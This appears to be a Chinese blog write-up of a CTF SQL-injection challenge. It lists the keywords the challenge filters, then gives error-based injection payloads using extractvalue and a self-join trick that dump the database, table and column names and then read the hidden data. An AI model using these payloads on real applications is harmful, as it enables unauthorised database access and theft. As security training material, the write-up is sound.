-
sql报错注入和联合注入
- 过滤:
- as
- IF
- rand()
- LEFT
- by
- update
- =
- substring
- handler
- union
- floor
- benchmark
- COLUMN
- UPDATE
- &
- sys.schema_auto_increment_columns
- &&
- '1'='1'
- database
- case
- AND
- right
- CAST
- FLOOR
- left
- updatexml
- DATABASES
- BENCHMARK
- BY
- sleep
- DATABASE
- insert
- anandd
- ascii
- CAST()
其实一开始想到的是布尔盲注,因为输入1会返回txw4ever,输入0返回空白,但是禁用了ascii函数,禁用了updatexml函数,但是可以使用extractvalue函数。
database被禁,所以可以考虑用访问一个不存在的数据库来返回数据库。
- 1'||(select * from aa)#或者将||换成or,爆出sqlsql库。
- -1' || extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema like 'sqlsql')))#
- 爆出output表
- -1' || extractvalue(1,concat(0x5c,(select*from (select*from output a join output b)c)))#
- 爆出data列名
- -1' || extractvalue(1,mid(concat(0x7e,(select data from output)),1,30))#
- -1' || extractvalue(1,mid(concat(0x7e,(select data from output)),10,40))#
由于as也被过滤,无列名注入可以用join 连接
首先自连接查询出来的表,没有using条件的结果是两张表的笛卡尔积,那么列名必然会有重复的部分,而主键是不允许重复的,所以查询出来会报错,也就把列名爆出来了
select*from (select*from output a join output b)c -
相关阅读:
人工智能前沿——无人自动驾驶技术
SQLMAP自动注入-优化参数
【前端方案】-表格排序列LRU缓存方案
Java面向对象:封装
【从零开始学习 SystemVerilog】6.6、SystemVerilog 接口—— Clocking Blocks(下)
2023-10-25 数据库-数据库体系架构的理解-将数据库理论融入自身-记录与分析
错误的方向,加上自学就相当于是在自己慢性自杀。
网络安全清单:每个团队在远程工作时都需要了解的内容
IDEA插件Mybatis Log Plugin的安装及其使用教程
定时任务报警通知解决方案详解
- 原文地址:https://blog.csdn.net/m0_73847654/article/details/134534980
